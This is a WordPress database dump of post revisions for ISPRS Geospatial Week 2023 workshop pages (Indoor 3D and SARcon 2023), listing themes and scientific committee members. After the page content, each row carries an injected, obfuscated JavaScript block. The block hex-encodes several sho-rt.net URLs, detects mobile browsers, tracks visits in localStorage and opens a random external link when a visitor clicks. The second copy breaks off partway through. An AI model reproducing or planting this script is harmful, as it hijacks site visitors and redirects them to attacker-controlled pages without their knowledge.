(2735,1,'2022-10-13 10:44:34','2022-10-13 10:44:34','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIR</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">SECRETARY</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-10-13 10:44:34','2022-10-13 10:44:34','',2586,'https://gsw2023.com/?p=2735',0,'revision','',0),
(2736,1,'2022-10-13 16:13:17','2022-10-13 16:13:17','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">SARcon 2023 - SAR constellations and applications</span></strong></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"25px 20px 20px 20px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"47\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Scientific Committee:</strong></h5>\n<table style=\"font-weight: 400;\" width=\"877\">\n<tbody>\n<tr>\n<td width=\"105\">Tupin</td>\n<td width=\"104\">Florence</td>\n<td width=\"668\">Télécom Paris</td>\n</tr>\n<tr>\n<td width=\"105\">Gong</td>\n<td width=\"104\">Jianya</td>\n<td width=\"668\">Wuhan University, China</td>\n</tr>\n<tr>\n<td width=\"105\">Schmitt</td>\n<td width=\"104\">Michael</td>\n<td width=\"668\">University of the Bundeswehr Munich</td>\n</tr>\n<tr>\n<td width=\"105\">Ding</td>\n<td width=\"104\">Chibiao</td>\n<td width=\"668\"></td>\n</tr>\n<tr>\n<td width=\"105\">Deng</td>\n<td width=\"104\">Yunkai</td>\n<td width=\"668\"></td>\n</tr>\n<tr>\n<td width=\"105\">Demir</td>\n<td width=\"104\">Nusret</td>\n<td width=\"668\">Akdeniz University, Dept.of Space Science and Technologies, Antalya, Türkiye</td>\n</tr>\n<tr>\n<td width=\"105\">Rosa</td>\n<td width=\"104\">Rafael</td>\n<td width=\"668\">Visiona Space Technology, Brazil</td>\n</tr>\n<tr>\n<td width=\"105\">Sanli</td>\n<td width=\"104\">Füsun Balik</td>\n<td width=\"668\">Yildiz Technical University, Turkey</td>\n</tr>\n<tr>\n<td width=\"105\">Mohamadi</td>\n<td width=\"104\">Bahaa</td>\n<td width=\"668\">INERSIA SAR MONITORING</td>\n</tr>\n<tr>\n<td width=\"105\">Shabahzi</td>\n<td width=\"104\">Mohzdeh</td>\n<td width=\"668\">Natural Resources Canada, Government of Canada</td>\n</tr>\n<tr>\n<td width=\"105\">Sica</td>\n<td width=\"104\">Francescopaolo</td>\n<td width=\"668\">University of the Bundeswehr Munich</td>\n</tr>\n<tr>\n<td width=\"105\">Crespi</td>\n<td width=\"104\">Mattia</td>\n<td width=\"668\">Sapienza University of Rome, Italy</td>\n</tr>\n<tr>\n<td width=\"105\">Crosetto</td>\n<td width=\"104\">Michele</td>\n<td width=\"668\">Centre Tecnològic de Telecomunicacions de Catalunya (CTTC), Spain</td>\n</tr>\n<tr>\n<td width=\"105\">ElGharbawi</td>\n<td width=\"104\">Tamer</td>\n<td width=\"668\">Suez Canal University, Egypt</td>\n</tr>\n<tr>\n<td width=\"105\">Hänsch</td>\n<td width=\"104\">Ronny</td>\n<td width=\"668\">DLR, Germany</td>\n</tr>\n<tr>\n<td width=\"105\">Sica</td>\n<td width=\"104\">Francescopaolo</td>\n<td width=\"668\">University of the Bundeswehr Munich, Germany</td>\n</tr>\n<tr>\n<td width=\"105\">Abdikan</td>\n<td width=\"104\">Saygin</td>\n<td width=\"668\">Hacettepe University, Turkey</td>\n</tr>\n<tr>\n<td width=\"105\">Üstüner</td>\n<td width=\"104\">Mustafa</td>\n<td width=\"668\">Artvin Coruh University, Turkey</td>\n</tr>\n<tr>\n<td width=\"105\">Pepe</td>\n<td width=\"104\">Antonio</td>\n<td width=\"668\">Institute for Electromagnetic Sesning of Environment (IREA), Italy</td>\n</tr>\n<tr>\n<td width=\"105\">Calò</td>\n<td width=\"104\">Fabiana</td>\n<td width=\"668\">Institute for Electromagnetic Sesning of Environment (IREA), Italy</td>\n</tr>\n<tr>\n<td width=\"105\">Shafiyoddin</td>\n<td width=\"104\">Sayyad</td>\n<td width=\"668\">Milliya Arts, Science &amp; Management Science College, India</td>\n</tr>\n<tr>\n<td width=\"105\">Erten</td>\n<td width=\"104\">Esra</td>\n<td width=\"668\">Istanbul Technical University, Dept.of Geomatics Engineering, Istanbul, Türkiye</td>\n</tr>\n<tr>\n<td width=\"105\">Lazecky</td>\n<td width=\"104\">Milan</td>\n<td width=\"668\">School of Earth and Environment, University of Leeds , UK</td>\n</tr>\n</tbody>\n</table>\n<h6></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 